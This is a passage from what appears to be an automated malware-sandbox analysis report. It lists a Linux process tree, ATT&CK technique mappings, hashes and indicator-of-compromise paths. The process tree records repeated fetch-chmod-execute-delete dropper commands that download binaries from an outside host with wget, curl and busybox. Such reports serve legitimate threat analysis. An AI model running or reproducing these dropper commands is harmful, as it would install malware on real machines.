  PID:949
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:950
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - System Network Configuration Discovery
  PID:952
- /bin/chmod
  chmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - File and Directory Permissions Modification
  PID:953
- /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  ./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - Executes dropped EXE
  PID:954
- /bin/rm
  rm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  PID:955
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  PID:956
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:957
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - System Network Configuration Discovery
  PID:959
- /bin/chmod
  chmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - File and Directory Permissions Modification
  PID:960
- /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  ./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - Executes dropped EXE
  PID:961
- /bin/rm
  rm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  PID:962
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - System Network Configuration Discovery
  PID:963
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:964
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - System Network Configuration Discovery
  PID:966
- /bin/chmod
  chmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - File and Directory Permissions Modification
  PID:967
- /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  ./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - Executes dropped EXE
  PID:968
- /bin/rm
  rm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  PID:969
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  PID:970
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:971
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - System Network Configuration Discovery
  PID:973
- /bin/chmod
  chmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - File and Directory Permissions Modification
  PID:974
- /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  ./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - Executes dropped EXE
  PID:975
- /bin/rm
  rm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  PID:976
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  PID:977
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:978
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - System Network Configuration Discovery
  PID:980
- /bin/chmod
  chmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - File and Directory Permissions Modification
  PID:981
- /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  ./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - Executes dropped EXE
  PID:982
- /bin/rm
  rm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  PID:983
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  PID:984
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:985
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - System Network Configuration Discovery
  PID:987
- /bin/chmod
  chmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - File and Directory Permissions Modification
  PID:988
- /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  ./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - Executes dropped EXE
  PID:989
- /bin/rm
  rm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  PID:990
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - System Network Configuration Discovery
  PID:991
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:992
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - System Network Configuration Discovery
  PID:994
- /bin/chmod
  chmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - File and Directory Permissions Modification
  PID:995
- /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  ./nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - Executes dropped EXE
  PID:996
- /bin/rm
  rm nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  PID:997
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - System Network Configuration Discovery
  PID:998
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:999
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - System Network Configuration Discovery
  PID:1001
- /bin/chmod
  chmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - File and Directory Permissions Modification
  PID:1002
- /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  ./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - Executes dropped EXE
  PID:1003
- /bin/rm
  rm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  PID:1004
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  PID:1005
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1006
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - System Network Configuration Discovery
  PID:1008
- /bin/chmod
  chmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - File and Directory Permissions Modification
  PID:1009
- /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  ./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - Executes dropped EXE
  PID:1010
- /bin/rm
  rm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  PID:1011

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	process
/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0	742	tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe	750	cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz	757	e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne	789	tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo	818	EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw	826	UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8	841	nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ	864	zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO	877	UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ	884	JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG	891	7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc	898	xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a	905	0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6	912	GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6	919	GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc	926	xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a	933	0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe	940	cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0	947	tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne	954	tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz	961	e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ	968	JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG	975	7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo	982	EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw	989	UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8	996	nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ	1003	zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO	1010	UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO